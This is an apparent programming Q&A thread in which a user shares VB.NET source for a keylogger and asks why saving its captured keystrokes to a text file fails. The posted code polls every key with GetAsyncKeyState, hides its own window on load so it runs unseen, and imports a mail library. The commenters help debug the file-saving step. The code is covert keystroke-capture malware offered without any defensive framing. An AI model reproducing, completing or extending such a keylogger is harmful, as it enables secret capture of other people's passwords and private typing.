# How to save the output of a program to a text document?

Tags: vb.net, visual-studio-2013, file-io

I'm using visual studio 2013.  Now I'm making a very simple keylogger to save the keys pressed by the user. And they are shown in a "richtextbox". I want to save the things shown in the richtextbox to a text document using visual studio 2013.
     Here is the code of my keylogger.

```
Imports System.Net.Mail

Public Class Form1
Dim result As Integer
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vkey As Int32) As Int16

Private Sub Timer1_Tick(sender As Object, e As EventArgs) Handles Timer1.Tick
    For i = 1 To 255
        result = 0
        result = GetAsyncKeyState(i)
        If result = -32767 Then
            RichTextBox1.Text = RichTextBox1.Text + Chr(i)
        End If
    Next i
End Sub


Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load
    Me.Hide()
    Me.Visible = False

End Sub
End Class
```

I tried to save using this code.

```
 Dim fileName As String = IO.Path.Combine(AppDomain.CurrentDomain.BaseDirectory, "output.txt")

    Dim data As New List(Of String)

    If IO.File.Exists(fileName) Then
        data = IO.File.ReadAllLines(fileName).ToList
        data.AddRange(RichTextBox1.Lines)
    Else
        data = RichTextBox1.Lines.ToList
    End If
    IO.File.WriteAllLines(fileName, data.ToArray)
```

But when i open the text document "output.txt", nothing can be seen inside that although all the keys I pressed are in the richtextbox.

Comment: add a breakpoint at the line `IO.File.WriteAllLines`, does it really get called? What is the value of data?

Comment: It would be better to set the breakpoint at the `Dim data as New List (Of String)` line and then you can step through the code to see what gets executed.  I've just tested your save code and it works just fine for me - the only difference was that I specified the save path manually.  It would be worth checking that you're looking at the correct file when checking it, or that the `data` variable actually contains the data before you save it.